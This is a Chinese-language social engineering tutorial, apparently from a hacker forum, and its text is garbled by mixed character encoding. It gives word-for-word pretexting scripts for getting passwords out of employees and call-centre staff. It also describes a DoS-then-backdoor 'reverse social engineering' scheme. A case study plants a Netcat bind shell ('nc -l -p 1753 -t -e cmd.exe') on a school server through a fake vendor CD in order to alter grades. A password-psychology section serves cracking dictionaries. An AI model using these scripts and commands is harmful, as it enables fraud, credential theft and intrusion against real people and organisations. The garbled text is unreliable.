社會工程學(xué)入門

社會工程學(xué)入門By：HUC緣生社會工程學(xué)入門社會工程學(xué)（SocialEngineering）

社會工程學(xué)是一種通過對受害者心理弱點(diǎn)、本能反應(yīng)、好奇心、信任、貪婪等心理陷阱進(jìn)行諸如欺騙、傷害等危害手段。取得自身利益的手法，近年來已成迅速上升甚至濫用的趨勢。那么，什么算是社會工程學(xué)呢？它并不能等同于一般的欺騙手法，社會工程學(xué)尤其復(fù)雜，即使自認(rèn)為最警惕最小心的人，一樣會被高明的社會工程學(xué)手段損害利益。社會工程學(xué)陷阱就是通常以交談、欺騙、假冒或口語等方式，從合法用戶中套取用戶系統(tǒng)的秘密。社會工程學(xué)是一種與普通的欺騙和詐騙不同層次的手法。因?yàn)樯鐣こ虒W(xué)需要搜集大量的信息針對對方的實(shí)際情況，進(jìn)行心理戰(zhàn)術(shù)的一種手法。系統(tǒng)以及程序所帶來的安全往往是可以避免的。而在人性以及心理的方面來說。社會工程學(xué)往往是一種利用人性脆弱點(diǎn)、貪婪等等的心理表現(xiàn)進(jìn)行攻擊，是防不勝防的。借此我們從現(xiàn)有的社會工程學(xué)攻擊的手法來進(jìn)行分析，借用分析來提高我們對于社會工程學(xué)的一些防范方法。熟練的社會工程師都是擅長進(jìn)行信息收集的身體力行者。很多表面上看起來一點(diǎn)用都沒有的信息都會被這些人利用起來進(jìn)行滲透。比如說一個(gè)電話號碼，一個(gè)人的名字。后者工作ID的號碼，都可能會被社會工程師所利用。在貓撲網(wǎng)上發(fā)現(xiàn)流傳著一句話，那就是我們所說的→人肉搜索達(dá)人，社會工程學(xué)身體力行者。社會工程學(xué)入門

許多人都說，關(guān)掉了的計(jì)算機(jī)才是安全的計(jì)算機(jī)，但這是錯(cuò)誤的，找個(gè)借口讓人去辦公室打開它就是了。你的對手不僅僅有一種方法可以從你那里得到他想要的信息，這只是時(shí)間的問題。耐心、個(gè)性和堅(jiān)持，這正是欺騙的藝術(shù)的切入點(diǎn)。要擊敗安全措施，一個(gè)攻擊者、入侵者，或是社會工程師，必須找到一個(gè)方法，從可信用戶那里騙取信息，或是不露痕跡的獲得訪問權(quán)。當(dāng)可信用戶被欺騙、影響，并被操縱而吐露出敏感信息時(shí)，或是做出了不當(dāng)?shù)呐e動(dòng)，從而讓攻擊者有漏洞可鉆時(shí)，什么樣的安全技術(shù)也無法保護(hù)住你的業(yè)務(wù)了。正如同密碼專家有時(shí)通過尋找漏洞來繞過加密技術(shù)解出密文一樣，社會工程師通過欺騙你的雇員來繞過安全技術(shù)。信任的弊端大多數(shù)情況下，成功的社會工程師都有著很強(qiáng)的人際交往能力。他們有魅力、講禮貌、討人喜歡，并具有快速建立起可親、可信感的特點(diǎn)。一個(gè)經(jīng)驗(yàn)豐富的社會工程師，使用他自已的戰(zhàn)略、戰(zhàn)術(shù)，幾乎能夠接近任何他感興趣的信息。精干的技術(shù)專家辛辛苦苦地設(shè)計(jì)出安全解決方案來最小化使用計(jì)算機(jī)的風(fēng)險(xiǎn)，然而卻沒有解決最大的漏洞――人為因素。盡管我們很聰明，但對我們?nèi)祟惃D―你、我、他的安全最嚴(yán)重的威脅，來自于我們彼此之間。社會工程學(xué)入門

每個(gè)讀者都一直在被社工――他們的父母所控制著，他們有辦法（比如：“這是為了你好”）讓你去做他們認(rèn)為最應(yīng)該做的事。父母們就是使用類似社會工程學(xué)的方法，巧妙的編出看似有理的故事、理由以及借口，來達(dá)到他們的目的。是的，我們都被我們的父母所引導(dǎo)――那些樂善好施的（偶爾也不完全如此）社會工程師們。

如果某個(gè)陌生人幫了你的忙，然后要你幫他，不要不經(jīng)過慎重考慮就回報(bào)他的幫助，要看對方要你做的是什么。社會工程師找了一個(gè)計(jì)算機(jī)知識很少的人。他知道的越多，就越可能產(chǎn)生懷疑，或越能斷定是被騙了。計(jì)算機(jī)白癡――對計(jì)算機(jī)操作和知識了解很少的人，則很容易遵從你的指示。他太容易掉入“只需下一個(gè)小程序”這樣的陷井了，因?yàn)樗麑σ粋€(gè)軟件程序可能造成的損害一無所知。而且，他很可能不知道他冒著風(fēng)險(xiǎn)放到網(wǎng)絡(luò)上的信息的價(jià)值。

社會工程學(xué)入門一、社會工程學(xué)的應(yīng)用與防護(hù)社會工程學(xué)入門1、假冒技術(shù)支持

社會工程攻擊的方法何很多，下面介紹假冒技術(shù)支持戰(zhàn)術(shù)：可以考察以下用于獲取數(shù)據(jù)網(wǎng)絡(luò)訪問權(quán)的不同偽裝示例。最成功的社會工程師是那些能夠以創(chuàng)新的方法勸導(dǎo)其他人向其提信息的人。社會工程的最常見形式是假冒技術(shù)支持．這里．假冒一名正在手機(jī)信息的技術(shù)支持工程師，收集的信息包括口令。滲透測試者：你好，我是技術(shù)支持部的張濤你注意到你的系統(tǒng)變慢了嗎？受騙用戶：還好，似乎還不太慢滲透測試者：嗯，我們看到網(wǎng)絡(luò)速度下降很多好的．讓我登錄你的PC上，測試一下你的機(jī)器。你的用戶名是jeouser，對嗎?

受騙用戶：是。

一般來說，用戶名與電子郵件地址中的名稱相同。比如，。那么在企業(yè)網(wǎng)絡(luò)中的用戶名很可能就是jeouser。我們可以從大多數(shù)企業(yè)的Web網(wǎng)站收集電子郵什地址。社會工程學(xué)入門滲透測試者：很好，讓我查一查你的口令嗯，系統(tǒng)太慢了，你的口令是什么？受騙用戶：是abc123。滲透測試者：好，我進(jìn)去了。似乎還不太壞。一定是沒有受到同樓層其他用戶的影響，奇怪。好了，我要查一查其他樓層的情況。謝謝你。受騙用戶：也謝謝你的幫助。社會工程學(xué)入門

這個(gè)示例展示了一個(gè)技術(shù)支持假冒的策略。在現(xiàn)實(shí)場景中，應(yīng)該向用戶詢問更多問題．以便建立用戶對你的信任。在了解企業(yè)內(nèi)部網(wǎng)絡(luò)的過程中加入一些幽默元素。企業(yè)網(wǎng)絡(luò)中最容易被忽略和未加保護(hù)的區(qū)域是在家庭中辦公的遠(yuǎn)程工作人員使用的機(jī)器。作為滲透測試人員，應(yīng)該測試這些遠(yuǎn)程用戶。通常情況下，對這些人實(shí)施社會工程更容易獲得成功，原因在于他們遠(yuǎn)離辦公室，而在辦公室的人員可能會受到安全培訓(xùn)和提醒。遠(yuǎn)程用戶通常是通過電話或支持人員的幫助來處理一些設(shè)置情況的。社會工程學(xué)入門2、第三方假冒

技術(shù)支持假冒的缺點(diǎn)之一是這個(gè)假冒是在太常見了。公司已經(jīng)意識到這種假冒技巧并要求防范。另一種技巧是第三方假冒，它能夠更成功的獲取內(nèi)部信息。

滲透測試者：你好，我是“值得信賴咨詢公司”的工作人員，我想給你介紹一下我們公司新的防火墻產(chǎn)品。受騙用戶：不錯(cuò)，但我們對現(xiàn)有產(chǎn)品已經(jīng)很滿意了滲透測試者：真的嗎?你們正在使用哪種類型的防火墻·

受騙用戶：我們現(xiàn)在用PlX和Netscreell防火墻滲透測試者：好，這兩款產(chǎn)品都十分優(yōu)秀，但你注意到了像Smurl和PingOfDeath這樣的拒絕服務(wù)攻擊的風(fēng)險(xiǎn)了嗎。你的防火墻能夠抵擋這些類型的攻擊嗎?(Smurf攻擊是以最初發(fā)動(dòng)這種攻擊的程序名Smurl來命名。這種攻擊方法結(jié)合使用了IP欺騙和ICMP回復(fù)方法使大量網(wǎng)絡(luò)傳輸充斥目標(biāo)系統(tǒng)，引起目標(biāo)系統(tǒng)拒絕為正常系統(tǒng)進(jìn)行服務(wù))(這種攻擊通過發(fā)送大于65536字節(jié)的ICMP包促操作系統(tǒng)崩潰；通常不可能發(fā)送大于65536個(gè)字節(jié)的ICMP包，但可以把報(bào)文分割成片段，然后在目標(biāo)主機(jī)上重組：最終會導(dǎo)致被攻擊目標(biāo)緩沖區(qū)溢出。)社會工程學(xué)入門受騙用戶：當(dāng)然能。滲透測試者：不錯(cuò)，我知道你對現(xiàn)有的產(chǎn)品很滿意現(xiàn)在，我們的產(chǎn)品能夠通過特殊過濾有效地保護(hù)電子郵件服務(wù)器。你的產(chǎn)品能夠保護(hù)郵件服務(wù)器嗎?

受騙用戶：這個(gè)問題我們并不關(guān)心，因?yàn)槲覀儾辉试S互聯(lián)網(wǎng)上的郵件進(jìn)入到我們的系統(tǒng)中。我們的郵件都來自總部。滲透測試者：喔，看起來你對現(xiàn)有產(chǎn)品很滿意。我不浪費(fèi)你的時(shí)間了。我把我的電話號碼和姓名留給你，在你需要的時(shí)候可以給我打電話（留下一個(gè)假名和假的電話號碼原因在于目標(biāo)或許永遠(yuǎn)不會打這個(gè)電話)。

在這個(gè)簡短的示倒中，你能夠發(fā)現(xiàn)防火墻的類型及它的一些配置。你會了解到，該公司或許阻塞或限制了ICMP協(xié)議，Smurf、和PingOfDeath攻擊使用了這個(gè)協(xié)議。你還知道電子郵件系統(tǒng)使用的TCP端口25不能通過互聯(lián)網(wǎng)訪問。這樣就節(jié)省了掃描這些協(xié)議的大量時(shí)間，減少了被發(fā)現(xiàn)的風(fēng)險(xiǎn)。社會工程學(xué)入門

第三方假冒的另一個(gè)示例是你假裝為某個(gè)貿(mào)易雜志的記者，你正在做公司產(chǎn)品的評論。絕大多數(shù)員工期待知道他們會在雜志中出現(xiàn)。在他們的熱功期待中，經(jīng)常會送出免費(fèi)產(chǎn)品，泄露不應(yīng)該與外界分享的內(nèi)部信息。這就是為什么公關(guān)人員應(yīng)該出現(xiàn)在會面中．樣品產(chǎn)品只應(yīng)該在驗(yàn)證了訪問者的身份之后才能夠發(fā)放的原因。你或許會發(fā)現(xiàn)，當(dāng)IT經(jīng)理認(rèn)為他正在面談?dòng)嘘P(guān)他的數(shù)據(jù)安傘時(shí)．他愿意泄露什么的信息。社會工程學(xué)入門

滲透測試者：到目前為止，你為保護(hù)你的基礎(chǔ)設(shè)施的安奎采取的步驟給我留下了很深刻的印象、(拍馬屁是打開更多信息大門的第一步，)受騙用戶：謝謝，在我們公司，我們把安全看得十分重要。滲透測試者：我已經(jīng)感受到了。你們公司強(qiáng)制實(shí)施什么安全策略了嗎？受騙用戶：嗯，當(dāng)然，我們制定了可接受的互聯(lián)網(wǎng)采略和口令策略，公司的所有員工在進(jìn)入公司時(shí)都要簽署這些策略。滲透測試者：很不錯(cuò)．詳細(xì)談一談，這很有趣。受騙用戶：嗯，例如，我們的口令策略要求所有用戶的口令至少要八個(gè)字符長．并且同時(shí)包含字母和數(shù)字。要求口令每三個(gè)月就要更換一次口令。滲透測試者：真的不錯(cuò)，我聽說，有些公司也強(qiáng)制實(shí)施這樣的策略，但員工可能會寫下他們的口令，并把它放在鍵盤下面你們公司存在這樣的問題嗎？受騙用戶：哈哈哈．是的，總是滋生這樣的情況我希望能蝣杜絕發(fā)生這樣的事情．我敢打賭．我們的用戶中有50％上的用戶會把口令寫在他們辦公桌的某個(gè)地方。

這個(gè)簡短的會面揭示，獲取進(jìn)入公司權(quán)限的最容易的辦法就是在用戶的辦公桌上尋找口令。你可在當(dāng)天的晚些時(shí)候進(jìn)入辦公樓．許要求使接待休息事。在下班之后(以及打掃衛(wèi)生人員進(jìn)來之前)，你可以離開休息室．走進(jìn)辦公率．在辦公桌上尋找能夠得到訪問權(quán)的口令。社會工程學(xué)入門

這里是曾經(jīng)發(fā)生的一個(gè)示例。幾年前，馬杰去一家不動(dòng)產(chǎn)公公司在管理員離開之后的安全性。當(dāng)他走到管理員的辦公桌前他發(fā)現(xiàn)了幾張馬匹的照片，馬杰猜想他一定擁有其中的一些馬匹，就故意對旁邊的小隔間大聲感嘆，“哇，多么漂亮的馬呀!，這是他的馬嗎?”在得到了肯定之后，馬杰問“他們叫什么名字?”果然，網(wǎng)絡(luò)管理員使用的口令是這些馬匹的名字之一。社會工程學(xué)入門3、末端用戶假冒、客戶假冒、反向社會工程

一、末端用戶假冒如果你能夠進(jìn)入到企業(yè)辦公樓中，你可以假冒末端用戶打電話給支持中心。從找到一臺未用的工作站開始。當(dāng)它引導(dǎo)起來后，工作站通常顯示最后一個(gè)使用它的用戶的名稱。按下來，多次在密碼提示框中鍵入一些偽造的口令。正常情況下這將導(dǎo)致該賬戶被鎖起來并要求出系統(tǒng)管理員解鎖。打電話給支持中心，并假裝你就是那個(gè)用戶。告訴IT工作人員你忘記了口令，并且已經(jīng)把自己鎖在了網(wǎng)絡(luò)之外。之后他會解鎖你的賬戶并向你提供一個(gè)新的口令?，F(xiàn)在你就以那個(gè)用戶置錄到網(wǎng)絡(luò)上。你會為這個(gè)伎倆成功的概率之高感到吃驚。社會工程學(xué)入門二、客戶假冒

如果說還有什么地方需要社會工程師進(jìn)行測試，那就是客戶服務(wù)中心?？蛻舴?wù)代表有權(quán)限訪問賬號、信用卡號碼以及社會安全號碼(在美國，其他國家往往是身份證號碼)。假設(shè)滲透測試人員使用下面的場景打電話給信用卡客戶服務(wù)中心：滲透測試者：喂，我要查一查我卡上的余額。受騙用戶：沒問題，你的賬號是多少?

滲透測試者：不好意思，信用卡現(xiàn)在沒有在我手邊。但我有我的地址。(你會發(fā)現(xiàn)可以很容易地使用電話號碼本采查到地址)

受騙用戶：沒有你的賬號號碼，我無法給你查賬戶信息。滲透測試者：幫幫忙吧。今天是我50周年結(jié)婚紀(jì)念日，我的妻子現(xiàn)在正在醫(yī)院。我想在下班后給她買一些補(bǔ)品，但不能肯定我的賬戶上是否還有足夠的錢。你能幫我查一查余額還有多少嗎?謝謝你。受騙用戶：好吧。你的地址是什么?

假設(shè)告訴了對方某個(gè)地址，客戶服務(wù)人員說出了余額，繼續(xù)下面的談話：滲透測試者：真是太感謝你了。我想網(wǎng)上訂購一些東西，在今天就交竹到我妻子那里。給她一個(gè)驚喜。嗯，但我現(xiàn)在手頭沒有賬戶號碼。你可以幫我念一念賬戶號碼嗎?

受騙用戶：好的。號碼是……社會工程學(xué)入門

但是信用卡公司不會落入這樣的陷阱。他們?yōu)槭裁床粫淙脒@類陷阱的原因是他們雇傭了滲透測試人員作為社會工程師對客戶代表進(jìn)行了測試，并制定了嚴(yán)厲的懲罰措施。正是這個(gè)原因，偽裝為公司內(nèi)部人員打電話通常會更容易成功。社會工程學(xué)入門三、反向社會工程

反向社會工翟比前面舶示例要略微復(fù)雜一些，但它的有效性不容懷疑。反向社會工程(ReverseSocialEngineering，RSE)由下述三步組成：

·破壞·廣告·支持在反向社會工程中，角色顛倒了過來。這里，不是像前一節(jié)講述的那樣打電話尋求幫助．攻擊者讓用戶給他打電話來尋求幫助。反向社會工程的操作方法是．首先破壞目標(biāo)網(wǎng)絡(luò)，這可以通過拒絕服務(wù)攻擊(DoS)來實(shí)現(xiàn)。之后．向該公司發(fā)送廣告，以網(wǎng)結(jié)安全工程師的身份推薦你的服務(wù)，說明在對抗拒絕服務(wù)攻擊方面體的特殊技能。當(dāng)公司雇用了你的服務(wù)之后，你開始提供支持井修復(fù)問題，與此同時(shí)。在公司網(wǎng)絡(luò)中安裝后門程序，這樣你可以在以后需要的時(shí)候進(jìn)入到公司網(wǎng)絡(luò)中。成功實(shí)施反向社會工程的最佳途徑并不是一開始就發(fā)起攻擊，而足等待到互聯(lián)網(wǎng)上傳播一種新的病毒時(shí)發(fā)起攻擊。以在病毒防護(hù)方面的特殊技能作為內(nèi)容發(fā)布你的服務(wù)廣告，當(dāng)你在修復(fù)公司問題的時(shí)候，建立一種通過開啟防火墻或安裝后門程序的方法，打開從互聯(lián)網(wǎng)上進(jìn)入該公司網(wǎng)絡(luò)的通道。作為滲透測試人員，這一點(diǎn)變得極為困難，原因在于在第一次測試之后．IT工作人員開始熟悉了你。對于利用下次病毒在互聯(lián)阿上發(fā)作進(jìn)行此類攻擊，你應(yīng)該得到管理層的書面允許。社會工程學(xué)入門

這個(gè)案例研究要求滲透測試者李明被應(yīng)用來對一所小學(xué)做社會工程測試。其目標(biāo)是獲取學(xué)校系統(tǒng)的訪問權(quán)限修改學(xué)生的成績。社會工程學(xué)入門

李明要做的第一步工作就是了解這所學(xué)校使用的學(xué)籍管理軟件。他開始在互聯(lián)同上進(jìn)行搜索．尋找通用的學(xué)籍管理軟件。李明找到了一些這樣的軟件，包括ActiD、Gradebook、AutoGrad、GradeGenie、ThinkWave，Next5G,ading、共拓學(xué)籍管理、點(diǎn)通學(xué)藉管理等。李明也瀏覽了一些教育論壇．尋找討論各學(xué)搜使用IT技術(shù)的情況。通過收集這方面的情況，事明找到了附近的一所小學(xué)，名字為”東方小學(xué)”。掌握了這些情況之后，李明在打電話時(shí)就胸有成竹了。李明打電話給這所學(xué)校，請求與負(fù)責(zé)技術(shù)的人員通話。對方將他介紹紿一位名叫馬濤的技術(shù)人員。下面是他們之間的淡話：

李明：你好，是馬濤馬先生嗎?我是李明，我在附近的“惠民小學(xué)”工作領(lǐng)導(dǎo)剛分配我負(fù)責(zé)學(xué)校的技術(shù)工作，但說實(shí)話，我對技術(shù)了解不多，因此我希望能夠得到你的幫助。至此，事明已經(jīng)說出了他的期待。由于人們通常都樂于幫助別人，李明認(rèn)如馬濤會樂于幫助他。

馬濤；李明．你好。你在惠民小學(xué)？趙華怎么了?我知道她在那所學(xué)校負(fù)責(zé)技術(shù)李明：呵呵，她現(xiàn)在不做這個(gè)工作了。但現(xiàn)拉她升官了。我是她的手下，她是一個(gè)很好的人。

社會工程學(xué)入門

盡管看起來李明就要露餡了，但謊稱趙華升職了。李明還通過贊揚(yáng)她的話語來使談話更輕松起來。

李明：最近，趙華讓我考察一下新的學(xué)籍管理軟件的事情。我看了幾個(gè)軟件比如：共拓學(xué)籍管理、一點(diǎn)通學(xué)藉管理等．但我不能確定哪一個(gè)軟件最靈活，你們用的是哪個(gè)學(xué)籍管理軟件？李明陳述了自己在學(xué)籍管理軟件方面的知識，來免除馬濤對自己教育背景的懷疑．李明還詢問馬濤哪一個(gè)軟件軟件最靈活，原因在于他在論壇中已經(jīng)看到這些軟件的流行程度和靈活程度的排名。

馬濤：我們一直在使用Gradebook．對這個(gè)軟件我們很滿意。至此，李明繼續(xù)問一些與這個(gè)軟件有關(guān)的問題，依據(jù)是事先對這個(gè)軟件的了解。當(dāng)談話結(jié)束時(shí)，李明已經(jīng)知道了這個(gè)學(xué)校使用的學(xué)籍軟件的類型．負(fù)責(zé)技術(shù)的工作人員的姓名是馬濤。在下一個(gè)階段，李明選擇了另一個(gè)人與馬濤聯(lián)系，原因在于他可能會聽出李明的聲音。此外，由于馬濤是位男士，常言道，男女搭配．干活不累，因此，李明請他的同事王晨冒充ThinkWave的銷售代表來打這個(gè)電話。在與馬濤聯(lián)系之前，王晨等待了數(shù)周，以避免惹人注目。社會工程學(xué)入門

王晨：你好，是馬濤嗎?我是ThinkWave公司的業(yè)務(wù)代表王晨。我們想請你參加我們的客戶改進(jìn)計(jì)劃，作為回報(bào)，在未來軟件升級時(shí)，貴?？梢缘玫?0％的折扣。

由于大多數(shù)公辦學(xué)校的資金都比較緊張，因此可以合理地認(rèn)為馬濤會被這個(gè)省錢的說辭打動(dòng)。

馬濤：是嗎?需要我做些什么?

王晨：這樣，我將向你發(fā)送一款報(bào)告軟件，你把它放在服務(wù)器上。在發(fā)送給你的郵件中，包含了這個(gè)軟件的配置方法。這個(gè)軟件的主要功能是。在系統(tǒng)出現(xiàn)任何錯(cuò)誤時(shí)．他都生成一份報(bào)告，并發(fā)送給我們。它不發(fā)送任何個(gè)人信息．僅僅發(fā)送計(jì)算機(jī)的類型、發(fā)生錯(cuò)誤的時(shí)間、發(fā)生錯(cuò)誤時(shí)系統(tǒng)中運(yùn)行的進(jìn)程。通過從我們的客戶那里收集這些信息．我們希望在未來的發(fā)行版本中能夠減少軟件錯(cuò)誤。馬濤：很好呀。在這次通話之后，李明從網(wǎng)上下載ThinkWave的標(biāo)志，并在信紙的抬頭上印上這個(gè)標(biāo)志。李明在網(wǎng)上找到FainkWave的地址，并向馬濤寄送一個(gè)包裹，寄件人地址寫上ThinkWave的地址。包括中包含了一張帶有Nctcat實(shí)用程序(當(dāng)然你也可以使用其他的木馬程序)的CD和一封信，信的內(nèi)容為：社會工程學(xué)入門馬先生，你好：感謝參與本公司客戶改進(jìn)計(jì)劃。我們確認(rèn)你的協(xié)助將會幫助改進(jìn)我們產(chǎn)品未來發(fā)行版本的質(zhì)量。與這封信一起寄給您的十一章包含報(bào)告軟件的CD。當(dāng)系統(tǒng)中發(fā)生錯(cuò)誤時(shí)這個(gè)軟件將會生成一份報(bào)告，并發(fā)送給我們。我向你保證不會發(fā)送任何個(gè)人信息。安裝這個(gè)報(bào)告程序的方法是將CD放到服務(wù)器光驅(qū)中，它將自動(dòng)啟動(dòng)安裝程序，如果沒有啟動(dòng)的話，使用setup.exe安裝。這個(gè)報(bào)告程序使用TCP端口1753，您需要在防火墻上打開這個(gè)端口。打開這個(gè)端口的具體方法，請參閱您的防火墻文檔。通過參與我們的客戶改進(jìn)計(jì)劃，在未來軟件升級時(shí)，你將自動(dòng)得到20%的折扣。感謝你的支持和參與。

祝身體健康、一切順利！

ThinkWave公司代表王晨

2007年4月26日社會工程學(xué)入門CD的內(nèi)容是李明生成的一個(gè)安裝程序，它將Netcat安裝在服務(wù)器硬盤的根目錄下：Netcal是一個(gè)后門應(yīng)用程序，它為李明提供了進(jìn)入服務(wù)器的遠(yuǎn)程訪問。安裝腳本使用下面的參數(shù)啟動(dòng)Netcat：

c:\nc-l-p1753-t-ecmd.exe

數(shù)天之后，李明請王晨打電話給馬濤。

王晨：你好，我是王晨，我這次打電話是想問一問你，在安裝我們的報(bào)告軟件時(shí)遇到什么問題了沒有?

馬濤：沒有，一點(diǎn)問題也沒有。王晨：這就好。我們就想聽到這樣的話?，F(xiàn)在我們需要知道你的外部IP地址，以便在我們收到報(bào)告時(shí)，知道這份報(bào)告來自你那里。馬濤：沒問題。我查一查，找到了，IP地址是200．300．55．28．王晨：太謝謝你了。如果你有什么需要，就告訴我們。你有我們的技術(shù)支持電話號碼嗎。馬濤：我有。社會工程學(xué)入門然后~~~~你懂的~~~~~社會工程學(xué)入門3、密碼心理學(xué)

（轉(zhuǎn)自紅盟論壇）

很多黑客的入門是從破解口令開始的！而是解密口令變成了由為重要的一門畢修課，今天我想談的不是如何去破解口令，而是一篇關(guān)于口令的心理學(xué)文章！如果下述的一些列子正好與你的口令設(shè)置大同小異，那么請你馬上改了它，你的口令被破解的可能性很大很大！

社會工程學(xué)入門

當(dāng)我們設(shè)定口令時(shí)一般的人都會用自己熟悉的單詞，這樣能使他們便于記憶！沒辦法，人天生就懶惰！那么哪些單詞是他們?nèi)菀子涀〉哪?！是不是沒有規(guī)律呢？非也！非也！我們可以來做一個(gè)心理試驗(yàn)！試驗(yàn)是這樣的我從大學(xué)中抽出了一百名學(xué)生，然后要他們寫下二個(gè)單詞！并告訴他們這個(gè)單詞是用于電腦的口令非常重要，且將來的使用率也很高！要求他們盡量慎重考慮！

社會工程學(xué)入門1，用自己的中文拼音者最多。37人這就告訴我們口令破解字典檔應(yīng)針對中國的特列！要用一些中文姓名拼音的字典檔！如：wanghai,zhangli,shenqin,等等！

2，用常用的英文單詞23人其中許多人都用了很有特定意義的單詞，如:hello,good,happy,anything,等等！

3，用計(jì)算機(jī)的中經(jīng)常出現(xiàn)的單詞18人這些單詞中還有操作系統(tǒng)的命令，如：system,

command,copy,harddisk,mouse,等等！

4，用自己的出生日期7人其中年月日各不相同！但其中有3人用了中國常用

的日期表示方法！如970203,199703.050498等！

上述測試中兩個(gè)單詞相同的有21人，接近相同的有33人！雖然還有一些人用的我沒給他們歸類，但還是有規(guī)律的！

希望上面的心理測試能給你的解密帶來一寫啟示！而不要在盲目的用暴力法了！社會工程學(xué)入門如何做一個(gè)紅客!新手必看?。?！

1.世界上的技術(shù)是人類發(fā)明出來的，但并不是說人家就有義務(wù)給你免費(fèi)分享

2.不要老是抱怨沒有高手教你，你應(yīng)該看到你自己本身的程度提出的問題是不是值得人家花時(shí)間，你的時(shí)間寶貴人家也是

3.最好的學(xué)習(xí)地方是論壇上，人家已經(jīng)發(fā)出來的帖子還有整集整集的資料，你沒有資格去要求人家重新再告訴你一次，如果讓你把一句話重復(fù)給幾萬個(gè)人